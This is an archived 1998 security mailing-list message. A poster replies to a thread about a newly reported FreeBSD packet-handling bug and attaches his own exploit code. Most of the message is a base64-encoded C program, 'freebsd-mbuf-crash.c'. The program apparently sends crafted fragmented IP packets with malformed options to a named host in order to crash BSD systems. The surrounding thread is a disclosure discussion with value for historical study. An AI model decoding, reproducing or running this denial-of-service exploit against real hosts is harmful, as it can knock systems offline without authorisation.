This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mimeat_private for more info. --0-1938059902-914889574=:20814 Content-Type: TEXT/PLAIN; charset=US-ASCII Here is some exploit code I wrote a while back. It hardly ever crashes BSD because the conditions required for the bug to work are out of our controll. Jeff On Thu, 24 Dec 1998, Guido van Rooij wrote: > On Wed, Dec 23, 1998 at 11:17:48AM +0100, Ulf Munkedal wrote: > > Have I missed something on the list lately about these illegal packets that > > CERT are adressing ("constructing a sequence of packets with certain > > characteristics, an intruder can cause vulnerable systems to crash, hang, > > or behave in unpredictable ways")? > > > > Or is this just the old teardrop/newtear/boink/bonk/nestea2 problem that > > they are talking about? > > > > No. This is an entirely new problem. It was discovered by me after a bug > report for an SMP FreeBSD system. Since I know it is only a matter > of time before such a bug would be abused, I decided to inform > CERT (also because the problem has been present since at least the > BSD Net/2 release). No public exploits are known to me. > > -Guido > --0-1938059902-914889574=:20814 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="freebsd-mbuf-crash.c" Content-Transfer-Encoding: BASE64 Content-ID: <Pine.BSI.3.91.981228185934.20814Bat_private> Content-Description: LyogZnJlZWJzZC1tYnVmLWNyYXNoLmMgYnkgSmVmZiBSb2JlcnNvbiwgKGpl ZmZyQG53bGluay5jb20pLiBEZWMgMTEgMTk5OC4gDQogKiBJJ20gb25seSBy ZWxlYXNpbmcgdGhpcyBhcyBhbiBleGFtcGxlIGJlY2F1c2UgdGhlIGJ1ZyBo YXJkbHkgZXZlciByZWxpYWJseSBjcmFzaGVzIGEgbWFjaGluZS4NCiAqLw0K DQojaW5jbHVkZSA8c3RkaW8uaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCiNp bmNsdWRlIDxuZXRpbmV0L2lwLmg+DQojZGVmaW5lIF9fRkFWT1JfQlNEDQoj aW5jbHVkZSA8bmV0aW5ldC90Y3AuaD4NCiNpbmNsdWRlIDxuZXRpbmV0L2lu Lmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPGFycGEv aW5ldC5oPg0KI2luY2x1ZGUgPG5ldGRiLmg+DQojaW5jbHVkZSA8c3RyaW5n cy5oPg0KDQoNCnVfbG9uZyBodG9uYShjaGFyICpob3N0KQ0Kew0KCXVfbG9u ZwlhZGRyOw0KCXN0cnVjdAlob3N0ZW50ICpocDsNCg0KCWlmICgoYWRkcj1p bmV0X2FkZHIoaG9zdCkpID09IElOQUREUl9OT05FKSB7DQoJCWlmICgoaHAg PSBnZXRob3N0YnluYW1lKGhvc3QpKSA9PSBOVUxMKQ0KCQkJcmV0dXJuKC0x KTsNCgkJYmNvcHkoaHAtPmhfYWRkcl9saXN0WzBdLCAmYWRkciwgc2l6ZW9m KGFkZHIpKTsNCgl9CQ0KCXJldHVybihhZGRyKTsNCn0NCg0KaW50IG1haW4o aW50IGFyZ2MsIGNoYXIqIGFyZ3ZbXSkNCnsNCgljaGFyCWJ1ZlsxMjhdOw0K CXN0cnVjdAlpcCAqaXBoID0gKHN0cnVjdCBpcCAqKWJ1ZjsJDQoJdV9jaGFy CSppcG9wdGlvbnMgPSAodV9jaGFyICopKGJ1ZiArIHNpemVvZihzdHJ1Y3Qg aXApKTsNCglzdHJ1Y3QJdGNwaGRyICp0Y3BoID0gKHN0cnVjdCB0Y3BoZHIg KikoYnVmICsgNjApOw0KCWludAlzLCBpOw0KCXN0cnVjdAlzb2NrYWRkcl9p biBzaW47DQoNCglpZiAoYXJnYyAhPSAyKSB7DQoJCXByaW50ZigidXNhZ2Vc blx0JXMgPGhvc3Q+XG4iLCBhcmd2WzBdKTsNCgkJZXhpdCgxKTsNCgl9DQoJ cyA9IHNvY2tldChBRl9JTkVULCBTT0NLX1JBVywgSVBQUk9UT19SQVcpOw0K CWlmIChzIDwgMCkgew0KCQlwZXJyb3IoInNvY2tldCIpOw0KCQlleGl0KDEp Ow0KCX0NCglzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQoJc2luLnNpbl9w b3J0ID0gaHRvbnMoNyk7DQoJc2luLnNpbl9hZGRyLnNfYWRkciA9IGh0b25h KGFyZ3ZbMV0pOw0KCWlmIChzaW4uc2luX2FkZHIuc19hZGRyID09IC0xKSB7 DQoJCXByaW50ZigiRXJyb3IgcmVzb2x2aW5nICVzXG4iLCBhcmd2WzFdKTsN CgkJZXhpdCgxKTsNCgl9DQoNCgliemVybyhidWYsIHNpemVvZihidWYpKTsN CglpcGgtPmlwX2hsPTE1Ow0KCWlwaC0+aXBfdj00Ow0KCWlwaC0+aXBfbGVu PWh0b25zKDEyNCk7DQoJaXBoLT5pcF9pZD0gaHRvbnMoZ2V0cGlkKCkpOw0K CWlwaC0+aXBfb2ZmPSBodG9ucyhJUF9NRik7DQoJaXBoLT5pcF90dGwgPSAy NTU7DQoJaXBoLT5pcF9wID0gSVBQUk9UT19UQ1A7DQoJYmNvcHkoJnNpbi5z aW5fYWRkci5zX2FkZHIsICZpcGgtPmlwX2RzdCwgc2l6ZW9mKHVfbG9uZykp Ow0KCWlwaC0+aXBfc3JjLnNfYWRkciA9IGh0b25hKCIxMC4yLjMuNCIpOw0K CWZvciAoaSA9IDA7IGkgPCAyMDtpKyspIHsNCgkJaXBvcHRpb25zW2ldPTB4 ZmY7DQoJfQ0KCWlwb3B0aW9uc1swXSA9IDB4ZmY7IC8qIE1hZGUgdXAgb3B0 aW9uICovICANCglpcG9wdGlvbnNbMV0gPSAweDFhOw0KCW1lbXNldCgoY2hh ciAqKSZpcG9wdGlvbnNbMl0sIDB4ZmYsIDM3KTsNCglpcG9wdGlvbnNbMzld ID0gMTsgIC8qIElQX05PUCAqLw0KCXRjcGgtPnRoX3Nwb3J0ID0gaHRvbnMo NTUwNSk7DQoJdGNwaC0+dGhfZHBvcnQgPSBodG9ucygyMyk7DQoJdGNwaC0+ dGhfc2VxID0gaHRvbmwoMHhhYmNkZTEyMyk7DQoJdGNwaC0+dGhfYWNrID0g aHRvbmwoMHgzMjFlZGNiYSk7DQoJdGNwaC0+dGhfZmxhZ3MgPSBUSF9BQ0sg fCBUSF9QVVNIOw0KCXRjcGgtPnRoX3dpbiA9IGh0b25zKDB4MTIzNCk7DQoN CglpZiAoc2VuZHRvKHMsIGJ1ZiwgMTI0LCAwLCAoc3RydWN0IHNvY2thZGRy ICopJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpIDwgMTI0KSB7DQoJ CXBlcnJvcigic2VuZHRvIik7DQoJCWV4aXQoMSk7DQoJfQ0KCWlmIChzZW5k dG8ocywgYnVmLCAxMjQsIDAsIChzdHJ1Y3Qgc29ja2FkZHIgKikmc2luLCBz aXplb2Yoc3RydWN0IHNvY2thZGRyKSkgPCAxMjQpIHsJDQoJCXBlcnJvcigi c2VuZHRvIik7DQoJCWV4aXQoMSk7DQoJfQ0KCWlwaC0+aXBfbGVuID0gaHRv bnMoODApOw0KCWlwaC0+aXBfb2ZmID0gaHRvbnMoOCk7DQoJaWYgKHNlbmR0 byhzLCBidWYsIDgwLCAwLCAoc3RydWN0IHNvY2thZGRyICopJnNpbiwgc2l6 ZW9mKHN0cnVjdCBzb2NrYWRkcikpIDwgNjApIHsNCgkJcGVycm9yKCJzZW5k dG8iKTsNCgkJZXhpdCgxKTsNCgl9DQoJZXhpdCgwKTsNCn0NCg== --0-1938059902-914889574=:20814--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:26:32 PDT